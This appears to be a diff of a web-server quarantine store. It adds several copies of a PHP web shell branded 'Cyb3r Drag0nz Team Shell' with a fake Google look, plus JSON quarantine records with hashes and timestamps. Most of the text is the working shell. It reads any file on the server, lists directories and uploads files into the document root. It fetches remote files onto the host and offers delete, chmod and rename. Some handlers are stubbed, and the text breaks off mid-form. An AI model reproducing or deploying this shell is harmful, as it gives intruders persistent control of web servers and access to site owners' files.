color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4849",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.php7.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381489,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "ko6h7s5e9kak.php7.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json
Normal file
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4877",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381487,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "ko6h7s5e9kak.phtml.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
